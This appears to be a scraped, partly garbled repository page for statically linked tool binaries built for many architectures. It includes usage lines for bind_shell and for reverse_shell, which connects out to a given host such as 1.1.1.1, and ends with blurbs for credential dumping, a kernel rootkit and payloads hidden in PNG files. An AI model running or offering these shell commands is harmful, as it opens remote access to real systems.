Prebuilt binaries for multiple architeture (arm, armeb, aarch64, aarch64_be, mips, mips1, mipsel, mipsel1, mips64, mips64el, powerpc, powerpc64, powerpc64le, riscv64, i586, x86_64)
All binaries are statically linked and stripped.
Please go to the Release page for downloads. *archName*_tools.zip
contains tools’ binary (see Tools Section) for that specific arch, and allinone.zip
contains all of it.
Or download single file directly from bin
branch.
The source code and scripts can be
found in the branch.
buildroot 2014.11
because they remove support after that version.buildroot 2019.11.1
output/host
, others are from make sdk
)gdb 7.12.1
, others are 8.3.1
):(
)./bind_shell
will listen on port 3343 and ./bind_shell 6666
will listen on 6666../reverse_shell 1.1.1.1 12345
will connect to 1.1.1.1:12345; ./reverse_shell 1.1.1.1
will connect to 1.1.1.1:3343The config file for buildroot and github actions’ workflow file are in the src
branch.
bomber is an application that scans SBOMs for security vulnerabilities. So you've asked a vendor…
Embed a payload within a PNG file by splitting the payload across multiple IDAT sections.…
Exploit-Street, where we dive into the ever-evolving world of cybersecurity with a focus on Local…
Shadow Dumper is a powerful tool used to dump LSASS (Local Security Authority Subsystem Service)…
shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…
Extract and execute a PE embedded within a PNG file using an LNK file. The…